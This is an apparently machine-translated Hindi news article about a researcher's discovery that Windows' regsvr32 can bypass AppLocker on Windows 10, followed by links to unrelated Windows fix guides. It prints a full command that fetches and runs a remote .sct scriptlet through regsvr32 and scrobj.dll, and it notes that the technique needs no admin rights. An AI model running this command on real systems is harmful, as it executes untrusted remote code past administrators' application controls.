Regsvr32 का उपयोग विंडोज़ 10 पर ऐपलॉक को बायपास करने के लिए किया जा सकता है
वीडियो: Regsvr32 Windows applocker bypassed to execute remote payload, Kali Linux 2024
कोलोराडो के एक शोधकर्ता, जो केसी स्मिथ के नाम से जाना जाता है, ने पाया है कि Regsvr32 का उपयोग विंडोज 10 पर ऐपलॉकर को बायपास करने के लिए किया जा सकता है, और यह कंप्यूटर उपयोगकर्ताओं के लिए एक बड़ी समस्या है, विशेष रूप से व्यावसायिक वातावरण में उन लोगों के लिए।
AppLocker को सबसे पहले विंडोज 7 और विंडोज सर्वर 2008 R2 में पेश किया गया था। यह प्रशासकों को यह निर्दिष्ट करने के लिए डिज़ाइन किया गया है कि कौन सा समूह या उपयोगकर्ता फ़ाइलों की विशिष्ट पहचान के आधार पर कुछ या सभी अनुप्रयोगों का लाभ उठा सकते हैं। यदि आप एक ऐसे व्यक्ति हैं जो AppLocker का उपयोग करने के लिए जाता है, तो यह सामान्य ज्ञान होना चाहिए कि इसका उपयोग कुछ नियमों को बनाने के लिए किया जा सकता है ताकि अनुप्रयोगों को उनके ट्रैक में चलाने या उन्हें रोकने की अनुमति मिल सके।
जो लोग अनजान हो सकते हैं, उनके लिए Regvr32 का उपयोग DLL को पंजीकृत करने और अपंजीकृत करने के लिए किया जा सकता है। यह देखने के लिए एक-क्लिक टूल नहीं है क्योंकि यह एक कमांड-लाइन उपयोगिता है, इसलिए केवल उन्नत कंप्यूटर उपयोगकर्ताओं को इसका लाभ उठाना चाहिए जो इसे पेश करना है।
हम समझते हैं कि इस तकनीक का उपयोग करने से, यह कंप्यूटर सिस्टम की रजिस्ट्री को परिवर्तित नहीं करता है, जिससे एडमीन के लिए यह जानना मुश्किल हो जाता है कि क्या कोई बदलाव किया गया है।
regsvr32 / s / n / u /i:http://server/file.sct scrobj.dll
"आश्चर्यजनक बात यह है कि regsvr32 पहले से ही प्रॉक्सी से अवगत है, TLS का उपयोग करता है, पुनर्निर्देशन का पालन करता है, आदि … और … आपने एक हस्ताक्षरित, डिफ़ॉल्ट एमएस बाइनरी का अनुमान लगाया है। इसलिए, आपको केवल एक नियंत्रण वाली जगह पर अपने। Sct फ़ाइल को होस्ट करने की आवश्यकता है, ”स्मिथ ने लिखा।
उपरोक्त तकनीक के लिए प्रशासनिक विशेषाधिकारों की आवश्यकता नहीं है और यह रजिस्ट्री में परिवर्तन नहीं करता है। इसके अलावा, लिपियों को HTTP या HTTPS दोनों पर बुलाया जा सकता है। फिलहाल, Microsoft ने इस छोटी सी समस्या के लिए कोई पैच जारी नहीं किया है, इसलिए इस बिंदु पर एकमात्र विकल्प Regsvr32 को विंडोज फ़ायरवॉल के माध्यम से ब्लॉक करना है।
दिलचस्प बात यह है कि सॉफ्टवेयर दिग्गज को अभी तक इस ऑपरेटिंग सिस्टम का सामना करने वाले इस सुरक्षा मुद्दे के बारे में प्रतिक्रिया नहीं देनी है। अब चूंकि यह खुले में है, हम भविष्य के पैच की बातचीत के साथ-साथ कंपनी से कुछ सुनने की उम्मीद करते हैं।
फिक्स: इस उत्पाद कुंजी का उपयोग विंडोज़ की रिटेल कॉपी को स्थापित करने के लिए नहीं किया जा सकता है
यह समस्या निवारण मार्गदर्शिका आपको दिखाएगी कि आप त्रुटि संदेश से कैसे छुटकारा पा सकते हैं 'इस उत्पाद कुंजी का उपयोग विंडोज की खुदरा प्रतिलिपि स्थापित करने के लिए नहीं किया जा सकता है।'
खेल के प्रदर्शन का अनुकूलन करने के लिए खोज रहे हैं? यहाँ उपयोग करने के लिए सबसे अच्छे उपकरण हैं
यदि आप अपने विंडोज पीसी पर गेम के प्रदर्शन का अनुकूलन करना चाहते हैं, तो गेम फायर 6 (अनुशंसित), समझदार गेम बूस्टर, रेजर कॉर्टेक्स, डब्ल्यूटीफ़ास्ट या एमएसआई आफ्टरबर्नर का उपयोग करें।
फिक्स: 'उस कुंजी का उपयोग विंडोज़ त्रुटि के इस संस्करण को सक्रिय करने के लिए नहीं किया जा सकता है
यदि आप विंडोज 8 उपयोगकर्ताओं में से एक हैं जो ऑपरेटिंग सिस्टम को स्थापित करने की कोशिश कर रहे हैं और आपको संदेश मिलता है कि "विंडोज के इस संस्करण को सक्रिय करने के लिए उस कुंजी का उपयोग नहीं किया जा सकता है" तो यह विशेष रूप से आपके लिए बनाया गया ट्यूटोरियल है। इस मामले पर और अधिक जानकारी के लिए आप कैसे तय कर सकते हैं ...
